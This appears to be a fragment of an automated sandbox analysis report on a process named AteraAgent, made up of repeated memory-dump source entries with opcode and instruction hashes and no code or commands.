                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD01DD83B0EA874FF255975C289A1F45B94EF5517171482B7D00EC31F7DC4A5D1E42C1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c1a8e4bdedc775ca461fe6b989d00ab5d140a5ed92e6120ef43c2be6a2e43af2
                                                                                                                                                                                                                                          • Instruction ID: 05122ea5cf71c92b7fde7cd492201aa1cd1ef8e8d3198d8e48e86a0b9ea30186
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1a8e4bdedc775ca461fe6b989d00ab5d140a5ed92e6120ef43c2be6a2e43af2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5901D630B0994E4FE6D4DA9CA84577637C5EB99350F00027AE40DC3266ED19D80583C1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6a01474ab397bfd7bc898de5029969d9844709d0502333945b4eb9c3413c9c58
                                                                                                                                                                                                                                          • Instruction ID: 79f767f8243c85eef313ddb7841769896f0db073b62dd86260e5756d75fd4b7b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a01474ab397bfd7bc898de5029969d9844709d0502333945b4eb9c3413c9c58
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4501267284E2CA9FD3525F7098520F67FA8EF07340F0940A6E00DC64A3D95D564A8392
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 17671c2434b9282b33a90f23f9e746eaec32faccb9d0536854d562d6b7ae4ec4
                                                                                                                                                                                                                                          • Instruction ID: b0bacc621472168c9e05afcd07c022ad23a848f6c70f29873fc566f45855ef92
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17671c2434b9282b33a90f23f9e746eaec32faccb9d0536854d562d6b7ae4ec4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F0B42261DA880FE798962CAC4E9727BD4DB6B17671502FBE44DC7173E9079C068394
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 14db80f33487bc6ef93cca3f297b3240904f205372c1e56aabc8c8f6a252a791
                                                                                                                                                                                                                                          • Instruction ID: c1a66a7d1621a6ead050e926923456eb8a8c73bac93d9e2424c31cd9ef7c8171
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14db80f33487bc6ef93cca3f297b3240904f205372c1e56aabc8c8f6a252a791
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0601FD31A19A094FE384EB2CD49A3B5B3D1EF89351F1800FAC40DCB2A7DE1AAC408340
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c77fa63a1c722fb9bbb246e0056f75175cf8f08e67b025f8badabcf9cc74b673
                                                                                                                                                                                                                                          • Instruction ID: bc0ce76e05aafbfe8323e43da6fc44f6403bbe167dd7ff467ebecd7399262807
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c77fa63a1c722fb9bbb246e0056f75175cf8f08e67b025f8badabcf9cc74b673
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E601497180D6CD9FF755DB28C8591A9BFB0EF46240F0581FAD40DC70A3DA25190D87C1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: eca70e9ac17a7baaff88a0c75e4e32e1ffbe465db659cbec88e3c6d21b336dab
                                                                                                                                                                                                                                          • Instruction ID: c55e50c0bd4de38af1d8487f2f74b86ef463c22594308f77f68056a96370dda5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eca70e9ac17a7baaff88a0c75e4e32e1ffbe465db659cbec88e3c6d21b336dab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF012B1150EFC68FDB6E973854652B52FD5AF57240F0800BAC0CEC60A3DC45584E8391
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3d0a2dbab0f46596e5081cacb8bdba1fa2156dd38b7d6a04279f25272fc53a25
                                                                                                                                                                                                                                          • Instruction ID: 89226543c6bbf1cf17721c576916be052af09226ddecd41426ec585708053ebe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d0a2dbab0f46596e5081cacb8bdba1fa2156dd38b7d6a04279f25272fc53a25
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D901DB61A24E4F8FDE98EB6CD0505B673D5FFD9340B444979D00EC718AED18E8468780
Memory Dump Source
• Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 129f7767ce8debb8010b49c5425cb855fed44c97fbaa252eda399aaf8e26a33a
                                                                                                                                                                                                                                          • Instruction ID: 935bb2865aab5d51939b45909a887144f2d7c0c606a0511a26c3ca1533e78436
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 129f7767ce8debb8010b49c5425cb855fed44c97fbaa252eda399aaf8e26a33a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52F01D71A0992ECFDB94DF58D851AF8B372EB86211F0045B5D00DD3251CE3559458B81
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3eac208aed24c9387bf761e66625a58fd0264a91ec8730c53fa7444d826ff57c
                                                                                                                                                                                                                                          • Instruction ID: 015dfb8670bd874105f91a09f9198ffa96625a50a6920130f1ee15fe1e734897
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3eac208aed24c9387bf761e66625a58fd0264a91ec8730c53fa7444d826ff57c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39F0E93151AA8B4FD315D72C94445E47790FF45350B5442BAD449C73A7EB19EC8587C0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dbff2e36fd5514a4e84974e5e4b7632e68a252013f061629c298ff0f1cf6cd22
                                                                                                                                                                                                                                          • Instruction ID: e4f83e621b43b1c91edd2c0b2ea0734a8f424cbb93c96dcda7c462fa369c1859
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbff2e36fd5514a4e84974e5e4b7632e68a252013f061629c298ff0f1cf6cd22
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DF05C2161AE1A8FDEACE32C50557BA23D5EB96340F440039D40FC3197DC59684A43C0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 313e8958f7c31d2ca2d8a6e7c68873ee92c5985088c0f75e558dce6fc81d89b7
                                                                                                                                                                                                                                          • Instruction ID: d96d3e76b267b4e663057b1e688a84bda855e3e60230574553b94ded5ce2bdc9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 313e8958f7c31d2ca2d8a6e7c68873ee92c5985088c0f75e558dce6fc81d89b7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8F0A030C4560ECFC7149F95E4403FDB6B8FB4B205F402139D00DA2191C7B99699CB84
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f23d72ec4c6e9378c5757e06ba1e770a9bd6a822c9ee4e76871128a88b7437df
                                                                                                                                                                                                                                          • Instruction ID: 181dff8668501a6b2a2e605b78220c38dfe1ad82fe0edc301d0e77a84cdc5855
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f23d72ec4c6e9378c5757e06ba1e770a9bd6a822c9ee4e76871128a88b7437df
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F02471C0E689CFD7529F24884A2FDBBF5EF07340F8190EAD40CC60B2DA2599088382
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: df507c862a15b4c12ea61eb50f8f6f6f1e29e7ca75ce93002f93c16201bdc028
                                                                                                                                                                                                                                          • Instruction ID: 28a068df637204749bed533ffe981d2a1764a10b10ad52220fc6ead9654ed6b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df507c862a15b4c12ea61eb50f8f6f6f1e29e7ca75ce93002f93c16201bdc028
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F0B42120E98A8FD794CB4CD4D4B6177E6FBA9351F0441A9C18DC7256C6329C0587C0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a1e66476adc6ff9f8717c4df170bb53f6ef1b76555ac5168626590a0aaed1f51
                                                                                                                                                                                                                                          • Instruction ID: e202b02b441a1bd4397ac33ac2e63f61cc459f177bebfb5d9bb686dffecd49e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1e66476adc6ff9f8717c4df170bb53f6ef1b76555ac5168626590a0aaed1f51
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF054A5D2560ADBE784F798C8959BCB7F6FF8C750F504034E04DD3293CE2968418B91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e9997a20a632a8aeca57376c0e3c3b3ac0b50e36756f510009c13ecdb6241222
                                                                                                                                                                                                                                          • Instruction ID: 271ad43d66ca5713868928ab50742c5969a19c3ef23a58c012f922ea2301408e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9997a20a632a8aeca57376c0e3c3b3ac0b50e36756f510009c13ecdb6241222
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33E05271A0552D8EDB94EA68D451BEDB7B1FB94211F5044BAE00DE3252CA3569818B40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
Memory Dump Source
• Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false